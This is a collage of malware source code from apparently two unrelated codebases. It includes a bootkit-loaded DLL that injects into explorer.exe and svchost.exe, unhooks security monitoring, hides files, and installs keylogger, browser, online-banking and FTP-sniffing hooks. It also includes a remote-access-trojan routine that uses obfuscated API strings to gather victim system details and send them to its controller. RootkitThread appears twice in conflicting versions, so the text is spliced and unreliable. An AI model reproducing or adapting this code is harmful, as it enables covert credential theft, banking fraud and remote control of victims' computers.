void StartBootkitDll(void* Arguments)
{
// If Dll loaded by original Bootkit driver we MUST wait some timeout.
// This happens because by default bootkit driver call DllMain(_, DLL_PROCESS_ATTACH, _)
// at all.
// Waiting helps system to load all libraries in default load order. After loading all modules
// we can apply GetApi for our reasons.
DWORD timeout = 5 * 1000;
LDRDBG("StartBootkitDll", "Sleeping %d ms.", timeout);
pSleep(timeout);
LDRDBG("StartBootkitDll", "Waking up after %d ms.", timeout);
DebugReportInit();
// определяем в каком процессе находимся
char Name[MAX_PATH];
if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return;
PCHAR ShortName = File::ExtractFileNameA(Name, false);
DWORD Hash = STR::GetHash(ShortName, 0, true);
LDRDBG("StartBootkitDll", "LoaderDll loaded in path='%s' pid=%u...", Name, (DWORD)pGetProcessId() );
LDRDBG("StartBootkitDll", "LoaderDll wake up and check IsLoadedByOriginalBootkit=%d", IsDllLoadedByBootkitLoader());
if (!IsDllLoadedByBootkitLoader())
{
LDRDBG("StartBootkitDll", "LoaderDll is NOT loaded by Bootkit loader. Finished.");
return;
}
LDRDBG("StartBootkitDll", "LoaderDll detects original bootkit loading.");
if (Hash == 0x2608DF01 /* svchost.exe */)
{
LDRDBG("StartBootkitDll", "LoaderDll loaded in SVCHOST. ");
StartThread(DbgRptSvchostThread, NULL);
}
if (Hash == 0x490A0972 /* explorer.exe */)
{
LDRDBG("StartBootkitDll", "LoaderDll loaded in EXPLORER. ");
StartThread(DbgRptExplorerThread, NULL);
LDRDBG("StartBootkitDll", "Starting loading and run plug.");
StartThread(ExplorerLoadAndRunBotPlug, NULL);
}
LDRDBG("StartBootkitDll", "finished.");
}
VOID WINAPI Start(
PVOID NormalContext /*системный указатель*/,
PUSER_INIT_NOTIFY SystemArgument1 /*аргумент который нужно сохранить чтоб использовать общение с драйвером*/,
PVOID SystemArgument2/* ничего не передаеться*/
)
{
ResetBootkitLoaderFlag();
// стартуем поток загрузки длл
if (SystemArgument1 == NULL)
return;
// определяем в каком процессе находимся
char Name[MAX_PATH];
if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return;
PCHAR ShortName = File::ExtractFileNameA(Name, false);
DWORD Hash = STR::GetHash(ShortName, 0, true);
LDRDBG("BRDS", "LoaderDll loaded ...");
//// 301_ld запуск вообще (тут сети может не быть)
//PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("301_ld"));
if (Hash == 0x2608DF01 /* svchost.exe */)
{
PCHAR CL = (PCHAR)pGetCommandLineA();
LDRDBG("BRDS", "Драйвер перехватил запуск процесса svchost.exe ");
LDRDBG("BRDS", "Командная строка svchost.exe - %s ", CL);
//if (STR::Pos(CL, "localservice", 0, false) >= 0)
{
DLLLoader::StartLoaderThread(SystemArgument1);
}
}
if (Hash == 0x490A0972 /* explorer.exe */)
{
//
LDRDBG("BRDS", "Драйвер перехватил запуск эксплорера ");
StartThread(ExplorerStartProc, SystemArgument1);
}
};
DWORD WINAPI RootkitThread( LPVOID lpData )
{
// Поток работает в заинжекченном процессе
UnhookDlls();
HookZwResumeThread();
HookZwQueryDirectoryFile();
// Подготавливаем данные для события
TEventData Data;
ClearStruct(Data);
// Определяем имя приложения
PCHAR AppName = STR::Alloc(MAX_PATH);
if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
Data.Application = AppName;
// хук что ставиться при запуске Ibank Cyberplat как в ехе варианте так и веб
#ifdef RuBnkH //
if (IbankHooksMain() ) return 0;
//if (HookCyberplatPCMain()) return 0;
#endif
if ( IsTrade() )
{
return 0;
}
ApplicationStarted(&Data);
STR::Free(AppName);
return 0;
}
VOID UnhookModuleExports(HMODULE hModule)
{
CHAR szModuleFileName[MAX_PATH];
pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName));
PVOID pMap = MapBinary(szModuleFileName);
if (pMap)
{
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule);
if (pNtHeaders)
{
DWORD dwExportsSize;
//PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule);
// dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
/*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/
PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize);
if (ExportDirectory && dwExportsSize)
{
PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals);
PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions);
PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames);
for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++)
{
ULONG StartSize = 10;
PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]);
PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]);
if (m_memcmp(ApiStart,ApiOriginalStart,StartSize))
{
BOOL bRestore = TRUE;
// DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry]));
if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA"))
{
bRestore = FALSE;
}
if (*(BYTE*)ApiStart == 0xE9)
{
PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5);
CHAR FileName[MAX_PATH];
if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1))
{
if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll"))
{
// DbgPrint("Not restored.\n");
bRestore = FALSE;
}
}
}
if (bRestore)
{
ULONG Written;
if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written))
{
// DbgPrint("Restored.\n");
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
}
}
}
}
UnmapViewOfFile(pMap);
}
}
DWORD WINAPI RootkitThread( LPVOID lpData )
{
// Поток работает в заинжекченном процессе
UnhookDlls();
HookZwResumeThread();
HookZwQueryDirectoryFile();
// Подготавливаем данные для события
TEventData Data;
ClearStruct(Data);
// Определяем имя приложения
PCHAR AppName = STR::Alloc(MAX_PATH);
if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
Data.Application = AppName;
// HANDLE Thread = pGetCurrentThread();
// DWORD H = GetPidByThread(Thread);
#ifdef __keylogger_h__
HookKeyLogger();
#endif
#ifdef __java_h__
HookJava();
#endif
#ifdef __opera_h__
if ( HookOpera() )
{
return 0;
}
#endif
#ifdef InternetExplorerH
if ( HookInternetExplorer() )
{
InternetExplorerStarted(&Data);
BrowserStarted(&Data);
STR::Free(AppName);
return 0;
}
#endif
#ifdef FireFoxH
if ( HookMozillaFirefox() )
{
FireFoxStarted(&Data);
BrowserStarted(&Data);
STR::Free(AppName);
return 0;
}
#endif
// подгрузка длл которая позволяет удаленно следить за рабочим столом
#ifdef PokerH
if (IsPoker()) return 0;
#endif
// хук что ставиться при запуске Ibank Cyberplat как в ехе варианте так и веб
#ifdef RuBnkH //
if (IbankHooksMain() ) return 0;
if (HookCyberplatPCMain()) return 0;
#endif
/*if ( IsTrade() )
{
return 0;
}*/
FtpSniffer();
ApplicationStarted(&Data);
STR::Free(AppName);
return 0;
}
void CSystemManager::GetSystemInfo()
{
MESSAGEInfo Infomsg;
//获取操作系统相关信息
Infomsg.bToken = TOKEN_SYSTEMINFO;
//////////////CPU Speed/////////////////
DWORD dwCpu, dwBufLen;
HKEY hKey;
char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'};
RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07);
pRegOpenKeyExA( HKEY_LOCAL_MACHINE,
JYvni02,
0, KEY_QUERY_VALUE, &hKey );
dwBufLen = sizeof(DWORD);
char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'};
RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA");
pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);
char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'};
RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06);
pRegCloseKey(hKey);
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);
//Get CPU Info===============================
CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
// CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
hKey = NULL;
if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize = 128 * sizeof(TCHAR);
pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize);
pRegCloseKey(hKey);
}
//Get Computer & User Name========================
DWORD dwLen = sizeof(Infomsg.szPcName);
char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'};
GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16);
pGetComputerNameA(Infomsg.szPcName, &dwLen);
/*
dwLen = sizeof(Infomsg.szUserName);
GetUserName(Infomsg.szUserName,&dwLen); //获取当前用户名
*/
//获取当前用户名及计算机名称
GetCurrentUserNamet(Infomsg.szUserName);
//Get Screen Size=================================
char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'};
GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67);
pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN));
// UINT Porst =dwPort[nConnect];
if(nConnect==0)
pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]); //域名上线写入
if(nConnect==1)
pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]); //QQ上线写入
if(nConnect==2)
pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]); //网盘上线写入
pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]); //上线端口写入
char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03);
char szbuf[256];
pGetModuleFileNameA(NULL,szbuf,MAX_PATH); //用于获取程序本身路径
pwsprintfA(Infomsg.Program,"%s",szbuf );
if(Installope==0) //绿色一次性运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!"); //上线运行方式
}
else if(Installope==1) // 服务启动运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!"); //上线运行方式
}
else if(Installope==2) // 直接启动运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!"); //上线运行方式
}
pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus()); //杀毒软件
Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}
